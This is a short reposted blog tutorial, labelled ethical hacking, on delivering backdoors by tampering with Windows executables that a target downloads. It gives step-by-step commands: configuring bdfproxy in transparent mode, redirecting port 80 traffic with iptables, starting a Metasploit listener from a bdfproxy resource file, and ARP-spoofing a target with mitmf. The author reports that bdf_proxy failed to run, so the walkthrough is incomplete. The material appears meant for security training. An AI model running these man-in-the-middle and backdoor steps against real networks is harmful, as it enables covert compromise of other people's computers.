码迷,mamicode.com
首页 > 数据库 > 详细

Ethical Hacking - GAINING ACCESS(13)

时间:2020-01-05 13:40:25      阅读:87      评论:0      收藏:0      [点我收藏+]

标签:target   win   code   mamicode   windows   eth   hub   redirect   star   

CLIENT SIDE ATTACKS

Backdoor delivery method2 - backdooring exe downloads

  • Backdoor any exe the target downloads.
  • We need to be in the middle of the connection.

 

Install bdfproxy following the guide on the website - https://packages.debian.org/sid/all/bdfproxy/download.

https://github.com/secretsquirrel/BDFProxy - No longer update or support.

 

1. Set IP address in config.

leafpad /etc/bdfproxy/bdfproxy.cfg

Change the proxyMode to transparent, so the target machine has Internet connection.

技术图片

Change HOST IP address in WindowsIntel section, because our target is Windows machines.

技术图片

 

2. Start dbfproxy

bdf_proxy

 技术图片

 I met a problem to run bdf_proxy, and the offical website(https://github.com/secretsquirrel/BDFProxy) does NOT SUPPORT this program now.

I will continue to try to solve this problem later.

 

3. Redirect traffic to bafoxy.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

 

4. Start listening for connections

msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc

 

5. Start arp spoofing.

mitmf --arp --spoof --gateway [GATEWAY IP] --target [Target IP] -i [interface] 

 

6. When done reset IP tables rules.

./flushiptables.sh

 

Ethical Hacking - GAINING ACCESS(13)

标签:target   win   code   mamicode   windows   eth   hub   redirect   star   

原文地址:https://www.cnblogs.com/keepmoving1113/p/12152112.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!